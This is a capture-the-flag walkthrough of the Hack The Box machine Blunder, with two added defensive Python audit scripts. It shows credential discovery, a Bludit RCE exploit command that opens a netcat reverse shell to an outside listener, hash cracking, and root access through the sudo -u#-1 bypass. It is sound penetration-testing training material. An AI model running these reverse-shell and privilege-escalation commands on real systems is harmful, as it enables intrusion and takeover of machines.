
Blunder is an easy-rated Linux machine from Hack The Box. The path consists of finding credentials to log in to Bludit, using an RCE exploit to gain an initial shell, reading database files to pivot to another user, and finally spawning a root shell with a sudo security bypass.
Enumeration
Running nmap:
nmap -sC -sV 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds
Browsing to port 80 we find the following page:
Running gobuster we discover the following directories:
gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -x txt,php -q
/about (Status: 200)
/admin (Status: 301)
/0 (Status: 200)
/install.php (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)
Inspecting todo.txt we can read the following text:
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
From this information we have a possible user, fergus.
Browsing to /admin shows a login page for Bludit:
We have a user but still need a password. There are two approaches: using cewl to build a wordlist from the site and brute-force the login form, or inspecting the website for relevant information.
In this case we will investigate. Going to /about we find the following text:
Your About page is typically one of the most visited pages on your site, need to be simple with a few key things, such as your name, who are you, how can contact you, a small story, etc.
The mention of a story caught my attention. Going back to the site, the first post is about Stephen King, and one of its lines stands out over the rest:
He has created probably the best fictional character RolandDeschain in The Dark tower series
That character name must be the password; going back to the login page and trying fergus:RolandDeschain confirms it.
Exploitation
Searching for Bludit exploits I found the following directory traversal that allows RCE: https://www.exploit-db.com/exploits/48568
We can use that exploit to obtain a reverse shell; a netcat one will be taken from this page, which crafts them with your IP and port.
Running the exploit:
python3 exploit.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f"
╔╗ ┬ ┬ ┬┌┬┐┬┌┬┐ ╔═╗╦ ╦╔╗╔
╠╩╗│ │ │ │││ │ ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴ ╩ ╚╩╝╝╚╝
CVE-2019-16113 CyberVaca
[+] csrf_token: 0057b0263ced5122f5127fd410d3c296a106b47e
[+] cookie: h37jcdun9l47eg6snspill0ue6
[+] csrf_token: bb0bdf433be5421c5c7976a5b9bc2318674ccffe
[+] Uploading gdhajysx.jpg
[+] Executing command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f
[+] Delete: .htaccess
[+] Delete: gdhajysx.jpg
And we obtain a reverse connection as www-data:
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.191] 38356
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This shell can be upgraded into a full interactive tty:
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
As www-data we need to pivot to a user with more privileges. Enumerating the system, two different versions of Bludit are found under /var/www:
www-data@blunder:/var/www$ ls
bludit-3.10.0a bludit-3.9.2 html
A user and a password hash are found inside the bludit-3.10.0a databases directory:
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
Instead of using john we can use alternatives such as crackstation to crack the hash:
Now we can change user to hugo:
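The users.php file above is a PHP guard line followed by a JSON object, and the password value is a bare 40-hex digest with no salt field, which is why a precomputed lookup table could crack it. As an added example (not part of the writeup or of Bludit itself), this Python snippet parses that file layout and flags accounts whose stored credentials are weak by construction; the sample file and the "editor" account in it are constructed, only the "admin" entry mirrors the page.

```python
import json
import re

# Constructed sample mirroring the users.php layout shown above (PHP guard + JSON).
SAMPLE_USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
 "admin": {
  "nickname": "Hugo", "role": "User",
  "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
  "tokenAuth": "b380cb62057e9da47afce66b4615107d",
  "tokenAuthTTL": "2009-03-15 14:00"
 },
 "editor": {
  "nickname": "Editor", "role": "Editor",
  "password": "0123456789abcdef0123456789abcdef01234567",
  "salt": "constructed-salt-value",
  "tokenAuth": "", "tokenAuthTTL": ""
 }
}
"""

PHP_GUARD = re.compile(r"^\s*<\?php.*?\?>", re.DOTALL)
HEX40 = re.compile(r"^[0-9a-f]{40}$")


def load_bludit_db(text):
    """Strip the PHP guard Bludit prepends to its database files, then parse the JSON body."""
    return json.loads(PHP_GUARD.sub("", text, count=1))


def audit_users(db):
    """Return (username, finding) pairs for credential storage a defender should fix."""
    findings = []
    for name, user in db.items():
        pw = user.get("password", "")
        if HEX40.match(pw) and not user.get("salt"):
            # 40 hex chars with no salt is consistent with a plain SHA-1 digest,
            # which lookup tables (as used in the writeup) reverse in seconds.
            findings.append((name, "unsalted SHA-1 password hash"))
        if user.get("tokenAuth"):
            # The API token is a second credential kept in clear text in the same file.
            findings.append((name, "API token stored in clear text"))
    return findings
```

The real control is keeping bl-content/databases unreadable to the web-server user and moving to a salted, slow password hash; the audit only shows which accounts are exposed when that fails.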
www-data@blunder:/var/www$ su hugo
Password:
hugo@blunder:/var/www$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
Privilege Escalation
Running sudo -l as hugo gives an interesting output:
hugo@blunder:~$ sudo -l
Password:
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
Searching for this in Google leads to a sudo security bypass exploit: https://www.exploit-db.com/exploits/47502
As we can run commands as any user except root, we can pass user id -1 (-u#-1), which sudo interprets as 0, allowing us to spawn a root shell:
hugo@blunder:~$ sudo -u#-1 /bin/bash
Password:
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# whoami
root
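The bypass works because a rule of the form (ALL, !root) grants every run-as user and only excludes root, and sudo before 1.8.28 (the fix for CVE-2019-14287) mapped uid -1 to 0. As an added example (not from the writeup), this Python audit parses sudo -l output for such exclusion-only rules and compares the sudo version against the fixed release; the rule text mirrors the page, while the version banner and the extra www-data rule are constructed.

```python
import re

# Constructed inputs: the rules mirror the sudo -l output above, the version is made up.
SAMPLE_SUDO_L = r"""Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (www-data) NOPASSWD: /usr/bin/less
"""
SAMPLE_VERSION_BANNER = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2"

FIXED_VERSION = (1, 8, 28)  # CVE-2019-14287 was fixed in sudo 1.8.28
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<spec>.+)$")


def parse_sudo_version(banner):
    """Extract (major, minor, patch) from the first line of `sudo -V` output."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None


def exclusion_only_rules(sudo_l_output):
    """Rules granting ALL run-as users that rely solely on excluding root (!root or !#0)."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        # Run-as spec may be "users:groups"; only the user part matters here.
        users = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
        if "ALL" in users and any(u in ("!root", "!#0") for u in users):
            hits.append(line.strip())
    return hits


def audit(banner, sudo_l_output):
    """Combine version and rule checks: at risk only if both are present."""
    version = parse_sudo_version(banner)
    rules = exclusion_only_rules(sudo_l_output)
    unpatched = version is not None and version < FIXED_VERSION
    return {"version": version, "unpatched": unpatched, "rules": rules,
            "at_risk": unpatched and bool(rules)}
```

Upgrading sudo closes the uid -1 mapping, but the durable fix is to replace "everyone except root" grants with an explicit allowlist of run-as users.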